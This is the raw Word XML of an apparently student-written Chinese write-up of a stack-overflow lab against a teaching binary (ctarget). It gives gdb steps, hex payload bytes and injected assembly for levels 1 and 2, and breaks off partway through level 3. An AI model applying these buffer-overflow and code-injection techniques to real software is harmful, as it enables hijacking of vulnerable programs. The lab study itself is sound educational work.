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8C57" w14:textId="6A2144CD" w:rsidR="00281CBE" w:rsidRDefault="00281CBE" w:rsidP="00281CBE">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C72724C" w14:textId="5A6C5931" w:rsidR="00A944DE" w:rsidRDefault="00A944DE" w:rsidP="00A944DE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>level1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C3B7ED" w14:textId="7D7DE2D9" w:rsidR="00B96AA9" w:rsidRDefault="00B96AA9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>题目给出函数test，test里面有函数getbuf，然后它给定的提权函数是</w:t>
      </w:r>
      <w:r w:rsidR="009D5401">
        <w:t>touch1()</w:t>
      </w:r>
      <w:r w:rsidR="009D5401">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，我们那我们先g</w:t>
      </w:r>
      <w:r w:rsidR="009D5401">
        <w:t>db ctarge</w:t>
      </w:r>
      <w:r w:rsidR="009D5401">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t进入调试，然后输入</w:t>
      </w:r>
      <w:r w:rsidR="009D5401">
        <w:t>’disassemble getbuf’</w:t>
      </w:r>
      <w:r w:rsidR="009D5401">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看汇编代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61748B1A" w14:textId="194EB0D4" w:rsidR="009D5401" w:rsidRDefault="009D5401">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0ED58840" wp14:editId="405F0BA6">
            <wp:extent cx="5274310" cy="3766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8077" w14:textId="47BCDFCF" w:rsidR="009D5401" w:rsidRDefault="009D5401">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以很清楚的看到函数的缓冲区大小是0x</w:t>
      </w:r>
      <w:r>
        <w:t>28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t>40)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节，</w:t>
      </w:r>
      <w:r w:rsidR="008749ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后gets已经说明是库的标准函数了，gets函数是有漏洞的，它在读入字符串的时候不会对长度检测，而是给多少读多少。</w:t>
      </w:r>
      <w:r w:rsidR="009F16B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么</w:t>
      </w:r>
      <w:r w:rsidR="009C26E4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们可以用这个gets来实现栈溢出，执行我们的权限函数touch</w:t>
      </w:r>
      <w:r w:rsidR="009C26E4">
        <w:t>1()</w:t>
      </w:r>
      <w:r w:rsidR="009C26E4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="009F16B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们可以先用0</w:t>
      </w:r>
      <w:r w:rsidR="009F16B4">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="009F16B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节填充4</w:t>
      </w:r>
      <w:r w:rsidR="009F16B4">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="009F16B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个字节，然后再加上shell函数的地址。注意前面可以用除了</w:t>
      </w:r>
      <w:r w:rsidR="009F16B4">
        <w:t>0a</w:t>
      </w:r>
      <w:r w:rsidR="009F16B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的任意字节填充，因为0</w:t>
      </w:r>
      <w:r w:rsidR="009F16B4">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="009F16B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代表</w:t>
      </w:r>
      <w:r w:rsidR="009F16B4">
        <w:t>’\n’</w:t>
      </w:r>
      <w:r w:rsidR="009F16B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的意思，gets函数一旦读到这个字符就会认为字符串读取结束了。</w:t>
      </w:r>
      <w:r w:rsidR="009B7D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们用</w:t>
      </w:r>
      <w:r w:rsidR="009B7D8E">
        <w:t>print touch1</w:t>
      </w:r>
      <w:r w:rsidR="009B7D8E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去查看该函数的地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A327830" w14:textId="0920366D" w:rsidR="009B7D8E" w:rsidRDefault="009B7D8E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71AB2F9B" wp14:editId="4F4E47AA">
            <wp:extent cx="2933954" cy="3200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C21" w14:textId="3823126F" w:rsidR="009B7D8E" w:rsidRDefault="009B7D8E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现了提权函数的地址之后我们就可以构造payload了</w:t>
      </w:r>
      <w:r w:rsidR="00636BBD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。我们先q退出gdb，然后</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里先创建一个文本文件v</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">im </w:t>
      </w:r>
      <w:r w:rsidRPr="009B7D8E">
        <w:t>attack1.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后填充</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01046E57" w14:textId="77777777" w:rsidR="009B7D8E" w:rsidRDefault="009B7D8E" w:rsidP="009B7D8E">
      <w:r>
        <w:t xml:space="preserve">00 00 00 00 00 00 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2209B136" w14:textId="77777777" w:rsidR="009B7D8E" w:rsidRDefault="009B7D8E" w:rsidP="009B7D8E">
      <w:r>
        <w:t xml:space="preserve">00 00 00 00 00 00 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E02188" w14:textId="77777777" w:rsidR="009B7D8E" w:rsidRDefault="009B7D8E" w:rsidP="009B7D8E">
      <w:r>
        <w:t xml:space="preserve">00 00 00 00 00 00 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79735D98" w14:textId="77777777" w:rsidR="009B7D8E" w:rsidRDefault="009B7D8E" w:rsidP="009B7D8E">
      <w:r>
        <w:t xml:space="preserve">00 00 00 00 00 00 00 00 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DA8A0D" w14:textId="77777777" w:rsidR="009B7D8E" w:rsidRDefault="009B7D8E" w:rsidP="009B7D8E">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564C6F87" w14:textId="40CE055E" w:rsidR="009B7D8E" w:rsidRDefault="009B7D8E" w:rsidP="009B7D8E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>c0 17 40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB0C050" w14:textId="6E30A829" w:rsidR="0090277B" w:rsidRDefault="0090277B" w:rsidP="009B7D8E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意，地址在计算机里是小端序存储。</w:t>
      </w:r>
      <w:r w:rsidR="00907231">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也就是高地址存储高位字节，然后我们构造的payload是往栈底方向填充的，而栈又是向低地址增长的，因此如此反转过后我们的函数地址要按字节倒着填充。然后根据字节生成字符串文件</w:t>
      </w:r>
      <w:r w:rsidR="00636BBD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB00D7A" w14:textId="49736533" w:rsidR="00636BBD" w:rsidRDefault="00C92FC4" w:rsidP="009B7D8E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行题目给的</w:t>
      </w:r>
      <w:r>
        <w:t>hex2raw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，.</w:t>
      </w:r>
      <w:r>
        <w:t>/hex2raw &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地文件名</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成文件名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFE271F" w14:textId="67E70715" w:rsidR="0037716E" w:rsidRDefault="00D5508A" w:rsidP="009B7D8E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2507B0D5" wp14:editId="3317AD0D">
            <wp:extent cx="46863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4BF1" w14:textId="75ED6811" w:rsidR="00C92FC4" w:rsidRDefault="00677AE3" w:rsidP="009B7D8E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后再.</w:t>
      </w:r>
      <w:r>
        <w:t>/ctarget -q -</w:t>
      </w:r>
      <w:r w:rsidR="00F9260D">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成的文件名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBE514F" w14:textId="2E32EE2A" w:rsidR="009E5643" w:rsidRDefault="009E5643" w:rsidP="009B7D8E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里我生成的文件名叫a</w:t>
      </w:r>
      <w:r>
        <w:t>ttackraw1.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，然后终端输入运行命令，发现攻击成功了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E78D88" w14:textId="5C6EA103" w:rsidR="009E5643" w:rsidRDefault="009E5643" w:rsidP="009B7D8E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CC19AC7" wp14:editId="22361F01">
            <wp:extent cx="5274310" cy="647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0113" w14:textId="70F2AFAA" w:rsidR="007F29F4" w:rsidRDefault="00E0111C" w:rsidP="007F29F4">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>level2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F2FFD2" w14:textId="624CD3C9" w:rsidR="00AA5322" w:rsidRDefault="007F29F4" w:rsidP="007F29F4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个攻击</w:t>
      </w:r>
      <w:r w:rsidR="00CA1945">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行的函数名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>touch</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00CA1945">
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00CA1945">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个</w:t>
      </w:r>
      <w:r w:rsidR="00DE6E7C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>栈溢出的漏洞依然可以利用。但是</w:t>
      </w:r>
      <w:r w:rsidR="00DE6E7C">
        <w:t>print touch2</w:t>
      </w:r>
      <w:r w:rsidR="00DE6E7C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后你就会发现，</w:t>
      </w:r>
      <w:r w:rsidR="00AA5322">
        <w:t>touch2</w:t>
      </w:r>
      <w:r w:rsidR="00AA5322">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比t</w:t>
      </w:r>
      <w:r w:rsidR="00AA5322">
        <w:t>ouch1</w:t>
      </w:r>
      <w:r w:rsidR="00AA5322">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多了一个参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38659E37" w14:textId="366BD763" w:rsidR="00AA5322" w:rsidRDefault="00AA5322" w:rsidP="007F29F4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6232BEAA" wp14:editId="4FC96775">
            <wp:extent cx="40862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8CE" w14:textId="06017120" w:rsidR="007F29F4" w:rsidRDefault="00AA5322" w:rsidP="007F29F4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>故技重施之后发现：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005D952C" w14:textId="5795EE8E" w:rsidR="005C68A3" w:rsidRDefault="005C68A3" w:rsidP="007F29F4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6775327A" wp14:editId="3583304B">
            <wp:extent cx="5274310" cy="1284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891" w14:textId="77777777" w:rsidR="00DC1A84" w:rsidRDefault="00E62F8C" w:rsidP="003B172C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虽然我们成功执行了touch</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，但是还是失败了，</w:t>
      </w:r>
      <w:r w:rsidR="003B172C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现touch</w:t>
      </w:r>
      <w:r w:rsidR="003B172C">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="003B172C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事实上那个参数是用来检测是否与cookie匹配的，而cookie的值已经告诉你了。在3</w:t>
      </w:r>
      <w:r w:rsidR="003B172C">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="003B172C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位的程序里面，我们可以往返回地址后面写上cookie作为参数，但是6</w:t>
      </w:r>
      <w:r w:rsidR="003B172C">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="003B172C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位程序前6个参数采用寄存器传参，那么要成功攻击就必须修改rdi寄存器的值位cookie。因为我们直接在返回位置覆盖函数地址，跟普通调用的区别就少了参数的传递，所以rdi的值至少在执行getbuf函数的时候不会看遍，这里有4</w:t>
      </w:r>
      <w:r w:rsidR="003B172C">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="003B172C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节大小的栈空间，那么我们就可以往栈中注入代码，代码应该是</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23526E3B" w14:textId="47EF1937" w:rsidR="00E62F8C" w:rsidRDefault="003B172C" w:rsidP="003B172C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>ov rdi,0x59b997f</w:t>
      </w:r>
      <w:r w:rsidR="00317585">
        <w:t>a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A494B99" w14:textId="3BC4D563" w:rsidR="00347C12" w:rsidRDefault="002227B2" w:rsidP="003B172C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>all touch2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093B1275" w14:textId="1B91A4EF" w:rsidR="0035585A" w:rsidRDefault="0035585A" w:rsidP="003B172C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令的操作数是根据rip偏移来的，那确定不了这个偏移，就没办法准确的call到这个touch</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，那么换一个思路：先往栈上堆返回地址，再返回</w:t>
      </w:r>
      <w:r w:rsidR="009127AE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ret弹出返回，那么我们在往栈上注入代码就是：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D712FAE" w14:textId="542345B0" w:rsidR="009127AE" w:rsidRDefault="009127AE" w:rsidP="003B172C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>ov</w:t>
      </w:r>
      <w:r w:rsidR="001D0C02">
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001D0C02">
        <w:t>$0x59b997fa,%</w:t>
      </w:r>
      <w:r>
        <w:t>rdi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EF3B64" w14:textId="628553AB" w:rsidR="009127AE" w:rsidRDefault="009127AE" w:rsidP="003B172C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>ush</w:t>
      </w:r>
      <w:r w:rsidR="001D0C02">
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001D0C02">
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t>0x4017ec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C1880D" w14:textId="5DD0E37D" w:rsidR="009127AE" w:rsidRDefault="009127AE" w:rsidP="003B172C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>et</w:t>
      </w:r>
      <w:r w:rsidR="006F742F">
        <w:t>q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168C60ED" w14:textId="77777777" w:rsidR="004D1AAD" w:rsidRDefault="009127AE" w:rsidP="003B172C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就完成了，再加上填充字节总共4</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节再在末尾返回栈地址就可以直接执行刚刚注入的代码了</w:t>
      </w:r>
      <w:r w:rsidR="004D1AAD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。我们接下来就要确定栈的地址了。g</w:t>
      </w:r>
      <w:r w:rsidR="004D1AAD">
        <w:t xml:space="preserve">db ctarget </w:t>
      </w:r>
      <w:r w:rsidR="004D1AAD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后在getbuf这里下断点.</w:t>
      </w:r>
      <w:r w:rsidR="004D1AAD">
        <w:t>r -q</w:t>
      </w:r>
      <w:r w:rsidR="004D1AAD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行到</w:t>
      </w:r>
      <w:r w:rsidR="004D1AAD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="004D1AAD">
        <w:t>ub rsp,0x28</w:t>
      </w:r>
      <w:r w:rsidR="004D1AAD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这一步我们观察栈指针的位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642E8B8A" w14:textId="2227BBF0" w:rsidR="009127AE" w:rsidRDefault="004D1AAD" w:rsidP="003B172C">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6961A4C0" wp14:editId="61FA4D4A">
            <wp:extent cx="2446232" cy="198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BBF061" w14:textId="7B8D0061" w:rsidR="006503DC" w:rsidRDefault="0012103A" w:rsidP="003B172C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后就可以确定payload了，要注意小端的问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329AAACA" w14:textId="77777777" w:rsidR="00EC5DA0" w:rsidRDefault="00EC5DA0" w:rsidP="00EC5DA0">
      <w:r>
        <w:t>48 c7 c7 fa 97 b9 59 68</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7296D06F" w14:textId="77777777" w:rsidR="00EC5DA0" w:rsidRDefault="00EC5DA0" w:rsidP="00EC5DA0">
      <w:r>
        <w:t>ec 17 40 00 c3 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC7365A" w14:textId="77777777" w:rsidR="00EC5DA0" w:rsidRDefault="00EC5DA0" w:rsidP="00EC5DA0">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7CD045" w14:textId="77777777" w:rsidR="00EC5DA0" w:rsidRDefault="00EC5DA0" w:rsidP="00EC5DA0">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4EBC09" w14:textId="77777777" w:rsidR="00EC5DA0" w:rsidRDefault="00EC5DA0" w:rsidP="00EC5DA0">
      <w:r>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B548026" w14:textId="24C9FEE8" w:rsidR="00EC5DA0" w:rsidRDefault="00EC5DA0" w:rsidP="00EC5DA0">
      <w:r>
        <w:t>78 dc 61 55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7444C060" w14:textId="3925E1FA" w:rsidR="006525AA" w:rsidRDefault="006525AA" w:rsidP="00EC5DA0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A86566C" wp14:editId="12D40B4F">
            <wp:extent cx="5274310" cy="509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BB2C" w14:textId="05675735" w:rsidR="006B1C2E" w:rsidRDefault="006B1C2E" w:rsidP="00EC5DA0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到，攻击成功了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C72722" w14:textId="6F7B074D" w:rsidR="00984E6D" w:rsidRDefault="00984E6D" w:rsidP="00E5194F">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>evel</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD3FC43" w14:textId="5ED6F00A" w:rsidR="0048324D" w:rsidRDefault="0048324D" w:rsidP="0048324D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里的提权函数是touch</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，writeup中已经给了我们函数的语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C38F9D" w14:textId="5A6A238B" w:rsidR="0048324D" w:rsidRDefault="0048324D" w:rsidP="0048324D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A896902" wp14:editId="40F3EBFF">
            <wp:extent cx="5274310" cy="2013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D7A" w14:textId="2F51420C" w:rsidR="005A7882" w:rsidRPr="0048324D" w:rsidRDefault="005A7882" w:rsidP="0048324D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要求hexmatch函数返回true，这次攻击才能成功，题目也给了我们这个函数的语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0917C10C" w14:textId="5B5F8393" w:rsidR="00107DB8" w:rsidRDefault="00107DB8" w:rsidP="005A7882">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07873CEC" wp14:editId="7D03F312">
            <wp:extent cx="5274310" cy="1790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A9C" w14:textId="191A319F" w:rsidR="00B26C6D" w:rsidRDefault="00BB69E0" w:rsidP="005A7882">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个函数两个输入，一个就是val，那么实参就是cookie的值，已经确定了改不了了，sval参数是touch</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>原参数给的，因此我们在call</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>touch</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时候给rdi传的参数就可以是hexmatch的第二个参数。中间有一步是徐晃一枪，那就是这个随机函数了，但是接下来有一个sprintf函数，sprintf函数是将格式化字符串输出给s。那么把val以8位十六进制数给s的意思就</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidR="00911498">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00911498">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="005F2D77">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="005F2D77" w:rsidRPr="005F2D77">
        <w:t>59b997fa</w:t>
      </w:r>
      <w:r w:rsidR="005F2D77">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="004061E0">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="004061E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以s字符串看似随机实则固定的。字符串传参是传字符串首字符的char指针，数值为首字符到</w:t>
      </w:r>
      <w:r w:rsidR="004061E0">
